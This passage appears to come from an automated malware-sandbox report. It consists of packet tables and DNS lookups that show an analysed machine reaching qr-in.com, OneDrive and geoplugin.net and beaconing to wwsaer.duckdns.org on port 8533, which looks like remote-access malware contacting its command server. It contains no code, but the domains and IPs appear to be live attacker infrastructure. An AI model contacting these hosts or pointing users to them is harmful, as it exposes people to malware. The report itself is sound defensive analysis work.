                                                    May 23, 2024 20:21:06.345238924 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.345280886 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.345411062 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.345452070 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.345546961 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.345560074 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.345592976 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.345602989 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.345840931 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.345882893 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.346056938 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.346070051 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.346101999 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.346112013 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.346163988 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.346241951 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.347167969 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.347178936 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.347209930 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.347218990 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.347239971 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.347251892 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.347275972 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.347285986 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.347616911 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.347664118 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.347673893 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.347711086 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.347831011 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.347871065 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.348481894 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.348494053 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.348526955 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.348609924 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.348660946 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.348752022 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.348792076 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.348870039 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.348911047 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.349334955 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.349371910 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.349438906 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.349483967 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.349658012 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.349669933 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.349709988 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.349720955 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.349854946 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.349895954 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.350231886 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.350277901 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.350328922 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.350369930 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.350522041 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.350558996 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.351075888 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.351119995 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.351140022 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.351176023 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.351315022 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.351356983 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.351469040 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.351509094 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.351941109 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.351983070 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.352013111 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.352024078 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.352049112 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.352058887 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.352175951 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.352219105 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.352777004 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.352818966 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.352886915 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.352926016 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.353100061 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.353140116 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.353246927 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.353290081 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.353624105 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.353666067 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.353749037 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.353790045 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.354585886 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.354597092 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.354631901 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.382153034 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.382235050 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.422935009 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.422950029 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.422991037 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.422998905 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.423032045 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.423037052 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.423049927 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.423070908 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.423098087 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.423443079 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.423482895 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.424088955 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.424185991 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.424226999 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.424721003 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.424757957 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.425615072 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.425654888 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.425679922 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.425713062 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.425884962 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.425895929 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.425908089 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.425925970 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.425935984 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.425950050 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.426285982 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.426304102 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.426316977 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.426352024 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.426508904 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.426521063 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.426547050 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.426554918 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.427158117 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.427170038 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.427181005 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.427203894 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.427213907 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.427278042 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.427325964 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.427339077 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.427359104 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.427370071 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.427793026 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.427804947 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.427849054 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.428370953 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.428383112 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.428394079 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.428433895 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.428443909 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.430751085 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.431642056 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.432754993 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.432818890 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.432862043 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.433022022 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.433036089 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.433046103 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.433101892 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.433101892 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.433501005 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.433512926 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.433523893 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.433535099 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.433545113 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.433553934 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.433553934 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.434075117 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.434103966 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.434103966 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.434113026 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.435297966 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.435309887 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.435321093 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.435332060 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.435340881 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.435342073 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.435352087 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.435353041 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.435365915 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.435386896 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.435585976 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.435604095 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.435614109 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.435633898 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.435643911 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.436934948 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.436949015 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.436986923 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.437011957 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.437050104 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.437596083 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.437611103 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.437623978 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.437638998 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.437649965 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.437690020 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.437701941 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.437711954 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:06.437722921 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.437751055 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.437761068 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:06.440165997 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:07.519679070 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:08.070867062 CEST49170443192.168.2.22150.171.41.11
                                                    May 23, 2024 20:21:08.070960045 CEST44349170150.171.41.11192.168.2.22
                                                    May 23, 2024 20:21:08.071017027 CEST49170443192.168.2.22150.171.41.11
                                                    May 23, 2024 20:21:08.077176094 CEST49170443192.168.2.22150.171.41.11
                                                    May 23, 2024 20:21:08.077219009 CEST44349170150.171.41.11192.168.2.22
                                                    May 23, 2024 20:21:08.077276945 CEST49170443192.168.2.22150.171.41.11
                                                    May 23, 2024 20:21:08.117167950 CEST804916894.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:08.117232084 CEST4916880192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:08.234968901 CEST49171443192.168.2.2213.107.137.11
                                                    May 23, 2024 20:21:08.235002995 CEST4434917113.107.137.11192.168.2.22
                                                    May 23, 2024 20:21:08.235069036 CEST49171443192.168.2.2213.107.137.11
                                                    May 23, 2024 20:21:08.253604889 CEST49171443192.168.2.2213.107.137.11
                                                    May 23, 2024 20:21:08.253629923 CEST4434917113.107.137.11192.168.2.22
                                                    May 23, 2024 20:21:08.910821915 CEST4434917113.107.137.11192.168.2.22
                                                    May 23, 2024 20:21:08.910953999 CEST49171443192.168.2.2213.107.137.11
                                                    May 23, 2024 20:21:09.037045002 CEST49171443192.168.2.2213.107.137.11
                                                    May 23, 2024 20:21:09.037090063 CEST4434917113.107.137.11192.168.2.22
                                                    May 23, 2024 20:21:09.037497997 CEST4434917113.107.137.11192.168.2.22
                                                    May 23, 2024 20:21:09.242506027 CEST4434917113.107.137.11192.168.2.22
                                                    May 23, 2024 20:21:09.242561102 CEST49171443192.168.2.2213.107.137.11
                                                    May 23, 2024 20:21:09.309109926 CEST49171443192.168.2.2213.107.137.11
                                                    May 23, 2024 20:21:09.350497961 CEST4434917113.107.137.11192.168.2.22
                                                    May 23, 2024 20:21:09.588880062 CEST4434917113.107.137.11192.168.2.22
                                                    May 23, 2024 20:21:09.589643002 CEST4434917113.107.137.11192.168.2.22
                                                    May 23, 2024 20:21:09.589692116 CEST49171443192.168.2.2213.107.137.11
                                                    May 23, 2024 20:21:09.589765072 CEST49171443192.168.2.2213.107.137.11
                                                    May 23, 2024 20:21:09.589781046 CEST4434917113.107.137.11192.168.2.22
                                                    May 23, 2024 20:21:12.682890892 CEST491738533192.168.2.2291.92.251.26
                                                    May 23, 2024 20:21:12.694945097 CEST85334917391.92.251.26192.168.2.22
                                                    May 23, 2024 20:21:12.695012093 CEST491738533192.168.2.2291.92.251.26
                                                    May 23, 2024 20:21:12.699537992 CEST491738533192.168.2.2291.92.251.26
                                                    May 23, 2024 20:21:12.710988998 CEST85334917391.92.251.26192.168.2.22
                                                    May 23, 2024 20:21:13.352015972 CEST85334917391.92.251.26192.168.2.22
                                                    May 23, 2024 20:21:13.498806953 CEST85334917391.92.251.26192.168.2.22
                                                    May 23, 2024 20:21:13.498986959 CEST491738533192.168.2.2291.92.251.26
                                                    May 23, 2024 20:21:13.502772093 CEST491738533192.168.2.2291.92.251.26
                                                    May 23, 2024 20:21:13.515249014 CEST85334917391.92.251.26192.168.2.22
                                                    May 23, 2024 20:21:13.515302896 CEST491738533192.168.2.2291.92.251.26
                                                    May 23, 2024 20:21:13.525962114 CEST85334917391.92.251.26192.168.2.22
                                                    May 23, 2024 20:21:14.182883024 CEST85334917391.92.251.26192.168.2.22
                                                    May 23, 2024 20:21:14.184302092 CEST491738533192.168.2.2291.92.251.26
                                                    May 23, 2024 20:21:14.189225912 CEST85334917391.92.251.26192.168.2.22
                                                    May 23, 2024 20:21:14.311125040 CEST85334917391.92.251.26192.168.2.22
                                                    May 23, 2024 20:21:14.348349094 CEST4917480192.168.2.22178.237.33.50
                                                    May 23, 2024 20:21:14.374434948 CEST8049174178.237.33.50192.168.2.22
                                                    May 23, 2024 20:21:14.375667095 CEST4917480192.168.2.22178.237.33.50
                                                    May 23, 2024 20:21:14.385339975 CEST4917480192.168.2.22178.237.33.50
                                                    May 23, 2024 20:21:14.417984962 CEST8049174178.237.33.50192.168.2.22
                                                    May 23, 2024 20:21:14.512634993 CEST491738533192.168.2.2291.92.251.26
                                                    May 23, 2024 20:21:14.550710917 CEST85334917391.92.251.26192.168.2.22
                                                    May 23, 2024 20:21:14.550893068 CEST491738533192.168.2.2291.92.251.26
                                                    May 23, 2024 20:21:14.980772972 CEST85334917391.92.251.26192.168.2.22
                                                    May 23, 2024 20:21:14.984006882 CEST491738533192.168.2.2291.92.251.26
                                                    May 23, 2024 20:21:14.990283966 CEST85334917391.92.251.26192.168.2.22
                                                    May 23, 2024 20:21:15.016427994 CEST8049174178.237.33.50192.168.2.22
                                                    May 23, 2024 20:21:15.017720938 CEST4917480192.168.2.22178.237.33.50
                                                    May 23, 2024 20:21:15.042479992 CEST491738533192.168.2.2291.92.251.26
                                                    May 23, 2024 20:21:15.065089941 CEST85334917391.92.251.26192.168.2.22
                                                    May 23, 2024 20:21:16.000041008 CEST8049174178.237.33.50192.168.2.22
                                                    May 23, 2024 20:21:16.000103951 CEST4917480192.168.2.22178.237.33.50
                                                    May 23, 2024 20:21:44.986279964 CEST85334917391.92.251.26192.168.2.22
                                                    May 23, 2024 20:21:44.987716913 CEST491738533192.168.2.2291.92.251.26
                                                    May 23, 2024 20:21:45.010690928 CEST85334917391.92.251.26192.168.2.22
                                                    May 23, 2024 20:22:15.071388006 CEST85334917391.92.251.26192.168.2.22
                                                    May 23, 2024 20:22:15.073107958 CEST491738533192.168.2.2291.92.251.26
                                                    May 23, 2024 20:22:15.171334982 CEST85334917391.92.251.26192.168.2.22
                                                    May 23, 2024 20:22:20.927473068 CEST4917480192.168.2.22178.237.33.50
                                                    May 23, 2024 20:22:21.288342953 CEST4917480192.168.2.22178.237.33.50
                                                    May 23, 2024 20:22:21.888365984 CEST4917480192.168.2.22178.237.33.50
                                                    May 23, 2024 20:22:23.088428020 CEST4917480192.168.2.22178.237.33.50
                                                    May 23, 2024 20:22:25.488584042 CEST4917480192.168.2.22178.237.33.50
                                                    May 23, 2024 20:22:30.288901091 CEST4917480192.168.2.22178.237.33.50
                                                    May 23, 2024 20:22:39.888456106 CEST4917480192.168.2.22178.237.33.50
                                                    May 23, 2024 20:22:45.063025951 CEST85334917391.92.251.26192.168.2.22
                                                    May 23, 2024 20:22:45.064208031 CEST491738533192.168.2.2291.92.251.26
                                                    May 23, 2024 20:22:45.069108963 CEST85334917391.92.251.26192.168.2.22
                                                    May 23, 2024 20:22:53.987406969 CEST4916480192.168.2.22188.114.96.3
                                                    May 23, 2024 20:22:53.987502098 CEST4916580192.168.2.22188.114.96.3
                                                    May 23, 2024 20:22:53.987606049 CEST4916880192.168.2.2294.156.67.72
                                                    May 23, 2024 20:23:15.107801914 CEST85334917391.92.251.26192.168.2.22
                                                    May 23, 2024 20:23:15.109004021 CEST491738533192.168.2.2291.92.251.26
                                                    May 23, 2024 20:23:15.114157915 CEST85334917391.92.251.26192.168.2.22
                                                    May 23, 2024 20:23:45.151437044 CEST85334917391.92.251.26192.168.2.22
                                                    May 23, 2024 20:23:45.156579018 CEST491738533192.168.2.2291.92.251.26
                                                    May 23, 2024 20:23:45.210932970 CEST85334917391.92.251.26192.168.2.22
                                                    May 23, 2024 20:24:15.174567938 CEST85334917391.92.251.26192.168.2.22
                                                    May 23, 2024 20:24:15.176964998 CEST491738533192.168.2.2291.92.251.26
                                                    May 23, 2024 20:24:15.181993961 CEST85334917391.92.251.26192.168.2.22
                                                    May 23, 2024 20:24:45.218420029 CEST85334917391.92.251.26192.168.2.22
                                                    May 23, 2024 20:24:45.223254919 CEST491738533192.168.2.2291.92.251.26
                                                    May 23, 2024 20:24:45.228743076 CEST85334917391.92.251.26192.168.2.22
                                                    May 23, 2024 20:25:15.271591902 CEST85334917391.92.251.26192.168.2.22
                                                    May 23, 2024 20:25:15.272864103 CEST491738533192.168.2.2291.92.251.26
                                                    May 23, 2024 20:25:15.290884018 CEST85334917391.92.251.26192.168.2.22
                                                    May 23, 2024 20:25:45.371443033 CEST85334917391.92.251.26192.168.2.22
                                                    May 23, 2024 20:25:45.371895075 CEST491738533192.168.2.2291.92.251.26
                                                    May 23, 2024 20:25:45.381915092 CEST85334917391.92.251.26192.168.2.22
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    May 23, 2024 20:20:51.799896002 CEST5456253192.168.2.228.8.8.8
                                                    May 23, 2024 20:20:51.830313921 CEST53545628.8.8.8192.168.2.22
                                                    May 23, 2024 20:20:54.396055937 CEST5291753192.168.2.228.8.8.8
                                                    May 23, 2024 20:20:54.614442110 CEST53529178.8.8.8192.168.2.22
                                                    May 23, 2024 20:20:56.270772934 CEST6275153192.168.2.228.8.8.8
                                                    May 23, 2024 20:20:56.285890102 CEST53627518.8.8.8192.168.2.22
                                                    May 23, 2024 20:20:56.288355112 CEST5789353192.168.2.228.8.8.8
                                                    May 23, 2024 20:20:56.324982882 CEST53578938.8.8.8192.168.2.22
                                                    May 23, 2024 20:21:01.032942057 CEST5482153192.168.2.228.8.8.8
                                                    May 23, 2024 20:21:01.056195021 CEST53548218.8.8.8192.168.2.22
                                                    May 23, 2024 20:21:01.057789087 CEST5471953192.168.2.228.8.8.8
                                                    May 23, 2024 20:21:01.127434015 CEST53547198.8.8.8192.168.2.22
                                                    May 23, 2024 20:21:08.015712976 CEST4988153192.168.2.228.8.8.8
                                                    May 23, 2024 20:21:08.116492033 CEST5499853192.168.2.228.8.8.8
                                                    May 23, 2024 20:21:08.163175106 CEST5278153192.168.2.228.8.8.8
                                                    May 23, 2024 20:21:09.611063957 CEST6392653192.168.2.228.8.8.8
                                                    May 23, 2024 20:21:09.667346954 CEST6551053192.168.2.228.8.8.8
                                                    May 23, 2024 20:21:12.556982994 CEST6267253192.168.2.228.8.8.8
                                                    May 23, 2024 20:21:12.678985119 CEST53626728.8.8.8192.168.2.22
                                                    May 23, 2024 20:21:14.335055113 CEST5647553192.168.2.228.8.8.8
                                                    May 23, 2024 20:21:14.346271038 CEST53564758.8.8.8192.168.2.22
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    May 23, 2024 20:20:51.799896002 CEST192.168.2.228.8.8.80xfbb7Standard query (0)qr-in.comA (IP address)IN (0x0001)false
                                                    May 23, 2024 20:20:54.396055937 CEST192.168.2.228.8.8.80x6a5fStandard query (0)qr-in.comA (IP address)IN (0x0001)false
                                                    May 23, 2024 20:20:56.270772934 CEST192.168.2.228.8.8.80xb7a5Standard query (0)qr-in.comA (IP address)IN (0x0001)false
                                                    May 23, 2024 20:20:56.288355112 CEST192.168.2.228.8.8.80x7e5Standard query (0)qr-in.comA (IP address)IN (0x0001)false
                                                    May 23, 2024 20:21:01.032942057 CEST192.168.2.228.8.8.80x1100Standard query (0)qr-in.comA (IP address)IN (0x0001)false
                                                    May 23, 2024 20:21:01.057789087 CEST192.168.2.228.8.8.80x2664Standard query (0)qr-in.comA (IP address)IN (0x0001)false
                                                    May 23, 2024 20:21:08.015712976 CEST192.168.2.228.8.8.80xa18eStandard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                    May 23, 2024 20:21:08.116492033 CEST192.168.2.228.8.8.80xf9fbStandard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                    May 23, 2024 20:21:08.163175106 CEST192.168.2.228.8.8.80x3d2fStandard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                    May 23, 2024 20:21:09.611063957 CEST192.168.2.228.8.8.80xb9d4Standard query (0)f3rtrw.bl.files.1drv.comA (IP address)IN (0x0001)false
                                                    May 23, 2024 20:21:09.667346954 CEST192.168.2.228.8.8.80x46f6Standard query (0)f3rtrw.bl.files.1drv.comA (IP address)IN (0x0001)false
                                                    May 23, 2024 20:21:12.556982994 CEST192.168.2.228.8.8.80x9517Standard query (0)wwsaer.duckdns.orgA (IP address)IN (0x0001)false
                                                    May 23, 2024 20:21:14.335055113 CEST192.168.2.228.8.8.80xae70Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    May 23, 2024 20:20:51.830313921 CEST8.8.8.8192.168.2.220xfbb7No error (0)qr-in.com188.114.96.3A (IP address)IN (0x0001)false
                                                    May 23, 2024 20:20:51.830313921 CEST8.8.8.8192.168.2.220xfbb7No error (0)qr-in.com188.114.97.3A (IP address)IN (0x0001)false
                                                    May 23, 2024 20:20:54.614442110 CEST8.8.8.8192.168.2.220x6a5fNo error (0)qr-in.com188.114.96.3A (IP address)IN (0x0001)false
                                                    May 23, 2024 20:20:54.614442110 CEST8.8.8.8192.168.2.220x6a5fNo error (0)qr-in.com188.114.97.3A (IP address)IN (0x0001)false
                                                    May 23, 2024 20:20:56.285890102 CEST8.8.8.8192.168.2.220xb7a5No error (0)qr-in.com188.114.96.3A (IP address)IN (0x0001)false
                                                    May 23, 2024 20:20:56.285890102 CEST8.8.8.8192.168.2.220xb7a5No error (0)qr-in.com188.114.97.3A (IP address)IN (0x0001)false
                                                    May 23, 2024 20:20:56.324982882 CEST8.8.8.8192.168.2.220x7e5No error (0)qr-in.com188.114.96.3A (IP address)IN (0x0001)false
                                                    May 23, 2024 20:20:56.324982882 CEST8.8.8.8192.168.2.220x7e5No error (0)qr-in.com188.114.97.3A (IP address)IN (0x0001)false
